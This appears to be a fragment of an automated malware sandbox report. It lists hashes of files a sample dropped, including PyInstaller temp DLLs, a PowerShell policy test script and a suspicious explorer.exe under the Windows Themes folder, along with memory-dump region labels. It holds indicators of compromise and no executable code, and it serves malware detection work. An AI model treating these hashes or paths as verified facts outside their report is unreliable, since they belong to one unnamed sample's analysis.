SHA512 11001746aa23c5999778d9a17892da029dff5e8e34265efb40ab5704f4d5f52cc4750efbe0d8b911e1aeb1875e4f0a4398655e1bf63143abad83b39643c00b5a

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-namedpipe-l1-1-0.dll

MD5 f24f386cfa5f097b523ccfba5c8cdca3
SHA1 fc97363843226bb69b8a1f56d8b8735a087ac103
SHA256 b1b2595494072a52f1fc44586debf52312eab1a245a7a16185d7b1af37b159a6
SHA512 eb6c38a7ca3b627fc52b8de65e8564004923b4533b9c4c920666d1d4c32c762e65cc181742b39c688654c8639df6a385f7ea1fbe50a89471b2f938f897df4278

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-memory-l1-1-0.dll

MD5 ca3906b115461654eed0db5933eef5d5
SHA1 0f03527a70c14413a7d114431f60d610d1805b8b
SHA256 76a3aa52d49dd0d8e0451f4045f4d8ba05d2332d0db2a39408b85cd2e43b84a3
SHA512 ce6e067c528c76714c01cd2aaf052e170c2db0f77eec6486d15f08df357abe06a849b56506f89b95f1431a942b2b515f9cc626c7ec2847f4289fb613c91f6122

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-localization-l1-2-0.dll

MD5 b402ed77d6f31d825bda175dbc0c4f92
SHA1 1f2a4b8753b3aae225feac5487cc0011b73c0eb7
SHA256 6ed17fb3ca5156b39fbc1ef7d1eefa95e739857607de4cd8d41cecfcd1350705
SHA512 ec04013139f3fd9dbf22b92121d82b2eb97e136f8619790cde2d0b660280e838962f9006d3e4c3a359627b017f2b6ade7edff3bbc26e559c3de37540585602d9

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-libraryloader-l1-1-0.dll

MD5 b45f933a57e388cfc5399645cdb696f3
SHA1 d85450a4169c79b249d4ef64ad475f6645dc311c
SHA256 2f9c3b077da02c587964a59e9c4e2f383ff8357229eab4b4f04814df94d78ff0
SHA512 e0df0637bdaa4293ef0b4c0a5b9e40e5d2ea891dbb2ce465394efef8a1f07df52630069e63d5e800575ba55c78c79ce095aace3983258b4c576cde500ef3a3be

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-interlocked-l1-1-0.dll

MD5 28fd20b58320f0ed023d9ca19da3a06d
SHA1 b7948da624d84596055a9ae2a45aea3a9b2d7b9b
SHA256 2f2f9660f4ffa814f465676d5b9cb9bb70d0b7c5fc5eb14c34cfe94a50883b21
SHA512 822e34cacc70ee151ff534f960d0820ae7d184a764b41ce23828e8e0e80daf4888f528c9b1351a76883eea2c6eb9674c8418f1787c1999ea06191d67d3928418

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-heap-l1-1-0.dll

MD5 e93f34fdcd8e5ffc34af48c90f6f95d1
SHA1 1cdafb0dfb29712d37307bc5e5edefab0eef6d78
SHA256 eca63fc5c873ce8b36c507e2b9a88caaea9617c84669886b15f6bc38bd0024c6
SHA512 3bf430a6a20b020f60627ae68d6385f3abb7a89b16cccc4aed1939c28527680fce7a426f69353041c7ac50a177a8e7c3a631078e46bc73a8bf0e2b2e83a779a8

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-handle-l1-1-0.dll

MD5 c2cd29370b21c0361d7f79d248c05860
SHA1 52efda4ba402c793d4c75e6ce185720ae1432249
SHA256 550b4f5ba95108b01a24f05496576a4e73642334a10dde61b09846e0efb9f260
SHA512 d2165032403277ba10bfbb7861bbe7395a8b0847a669588d3780953d07c1b0ea4461acc49753e8d4978840307b1c50f9e814ab5b62b8e341159e02109bcbab71

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-file-l2-1-0.dll

MD5 361c6bcfcea263749419b0fbed7a0ce8
SHA1 03db13108ce9d5fc01cecf3199619ffbccbd855a
SHA256 b74aefd6fa638be3f415165c8109121a2093597421101abc312ee7ffa1130278
SHA512 aa8b585000cc65f9841b938e4523d91d8f6db650e0b4bb11efd740c27309bf81cdb77f05d0beda2489bf26f4fbc6d02c93ce3b64946502e2c044eea89696cc76

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-file-l1-2-0.dll

MD5 9d8413744097196f92327f632a85acee
SHA1 dfc07f5e5a0634dd1f15fdc9ff9731748fbff919
SHA256 6878d8168d5cc159efe58f14e5ba10310d99b53ab8495521e54c966994dac50b
SHA512 a8f6e9ee1c5d65f68b8b20d406d3e666c186e15cb3b92575257b5637fe7dd5ac7d75e9ad51c839ba4490512f68f6b48822fc9edd316dd7625d3627d3b975fb2a

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-file-l1-1-0.dll

MD5 33636552339a4a04d75b7c32dbec59d9
SHA1 6457c3941d57bebbc3a737c84377d102b6ece18f
SHA256 05b478718540a6f410a3ad859f7d5e56c223d6786eacc7e9bc80264f587fd0c7
SHA512 b0f9ffed8b8861c9599e5cf0fbc5374e7cd8d170a360a3dfeb37d381dabef941875eaf325666978071d25aa8f49d729684d8be71d12c1b5a8928a7c00156ed03

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-fibers-l1-1-0.dll

MD5 9714923d871b3f88f5be290382a5586d
SHA1 d4b90f3234ba2af1a182aa2b2e483c1d759fd4df
SHA256 b6c3e5d1d35c5b8ac1ca058815c25db87ce6d9c3bb62d9096922b0af2da679cd
SHA512 5b7264d382ffd3378a6a21cdce90bf00d6c018043a965e4fa9ced8361bcf8c0519297cd07572bef65f45eabcbd8451ab09bef43357fc7dd7e8c1a115a551be18

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-errorhandling-l1-1-0.dll

MD5 6177998c2ce574a177e524746b77efe7
SHA1 21f262c4826e6edd8534a9196afdfae9ac0e3d51
SHA256 a0aa340274d4bb46b6d9547d647ab7dc16c229577bbab836e6a4f3307f310332
SHA512 af8d6bbacd38b23f48f27bb472beb81ee4ee6200ae54317d282ada104252777b57b056fd5de5ff0463ede1be8b734a8741d80c65a70b37910c13f04d85005117

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-debug-l1-1-0.dll

MD5 4cb14835b061f42179d5251e744fd667
SHA1 4a1b0b32963a20c479927e4e008bfa9b4168f226
SHA256 f9aaaabf78feb39a1d8e971f5ce047d1c4a896a80409b800f1f7112cdce420ed
SHA512 20c11b2dcf8a928d04cfe6a0130716cc474d48c996025950214d6f9e97bf26b0ec6e2a68f954b0875fc05ca49811bc6e943f91b592fecd14cc8fddd3201841e9

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-datetime-l1-1-0.dll

MD5 928be2a3fc2e88bda5ca0808324e97c4
SHA1 b1e1bf73c5dfa99ad69bdc83ec6b6f65cef1c3e2
SHA256 cc6c2fdf1c34fa82036165b111f91220bcf7e43aab79dfb284f982f0590bebb1
SHA512 fc83a74dbd60ada174798d7f40d839f30ef4a288805121ea8d303e39c5fc81188f9ee86131c3df3e2b37edfcca2bfeb3f69aa14e93a0d5d87a6255c6e87c73a7

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-console-l1-1-0.dll

MD5 7699c096202da0db6b07fafc914d60ed
SHA1 6e952be34b9457b0cc3e4aa372d941030407a0fc
SHA256 0052515763a1a31d2527a2eb2523fb7b88d8e55c4e4da5ef352b565476bf21e0
SHA512 ae93507cae8d2096c688850d369f8ef282699770b1e27621ed8ebeede1bb285a290f1e2e06a6e9287a05c243b907371977501f1aa4181810913763e0d5bcc2c0

memory/1120-149-0x00007FFEEF640000-0x00007FFEEF654000-memory.dmp

memory/1120-150-0x00007FFEF7AB0000-0x00007FFEF7ABD000-memory.dmp

memory/1120-151-0x00007FFEE8160000-0x00007FFEE827B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oicgr1s3.p2m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4844-161-0x000002556DC90000-0x000002556DCB2000-memory.dmp

memory/2008-364-0x00000128F84F0000-0x00000128F84F8000-memory.dmp

memory/1120-387-0x00007FFEE9260000-0x00007FFEE9939000-memory.dmp

memory/1120-409-0x00007FFEF8560000-0x00007FFEF8585000-memory.dmp

memory/1120-412-0x00007FFEE8D70000-0x00007FFEE8EE6000-memory.dmp

memory/1120-411-0x00007FFEF7A50000-0x00007FFEF7A74000-memory.dmp

C:\Windows\Resources\Themes\explorer.exe

MD5 f34ecb224532e9537d0d045ca45a1671
SHA1 e41e8e3611d5ddbb9ec9ab6609389da34cf30dfc
SHA256 50ca6bbc0182c03eba5879422fe23628a201d8602d3ac559255faadefe6b9d46
SHA512 a25e8a4f9529200d28dbd93c31e771bfeef1312970874f3a387a3f01f51e2fdc2d98f55e1082bd61fc8e44e6cdb94015756b89ae8b5c026616ba52d9286765e0

memory/1120-419-0x00007FFEE9260000-0x00007FFEE9939000-memory.dmp

memory/1120-434-0x00007FFEEEF60000-0x00007FFEEEF93000-memory.dmp

memory/1120-430-0x00007FFEE8770000-0x00007FFEE8C99000-memory.dmp

memory/1120-429-0x00007FFEE8CA0000-0x00007FFEE8D6D000-memory.dmp

memory/1120-433-0x00007FFEE8160000-0x00007FFEE827B000-memory.dmp

memory/4364-451-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1120-450-0x0000023A95A10000-0x0000023A95F39000-memory.dmp

memory/2892-455-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2172-456-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4104-457-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4724-458-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1120-473-0x00007FFEE8160000-0x00007FFEE827B000-memory.dmp

memory/1120-470-0x00007FFEE8770000-0x00007FFEE8C99000-memory.dmp

memory/1120-484-0x00007FFEE8CA0000-0x00007FFEE8D6D000-memory.dmp

memory/1120-483-0x00007FFEEEF60000-0x00007FFEEEF93000-memory.dmp

memory/1120-482-0x00007FFEF8480000-0x00007FFEF848D000-memory.dmp

memory/1120-481-0x00007FFEF7830000-0x00007FFEF7849000-memory.dmp

memory/1120-480-0x00007FFEE8D70000-0x00007FFEE8EE6000-memory.dmp

memory/1120-479-0x00007FFEF7A50000-0x00007FFEF7A74000-memory.dmp

memory/1120-478-0x00007FFEF7AC0000-0x00007FFEF7AD9000-memory.dmp

memory/1120-477-0x00007FFEF7AE0000-0x00007FFEF7B0D000-memory.dmp

memory/1120-476-0x00007FFEF8520000-0x00007FFEF852F000-memory.dmp

memory/1120-475-0x00007FFEF8560000-0x00007FFEF8585000-memory.dmp

memory/1120-474-0x00007FFEE9260000-0x00007FFEE9939000-memory.dmp

memory/1120-472-0x00007FFEF7AB0000-0x00007FFEF7ABD000-memory.dmp

memory/1120-471-0x00007FFEEF640000-0x00007FFEEF654000-memory.dmp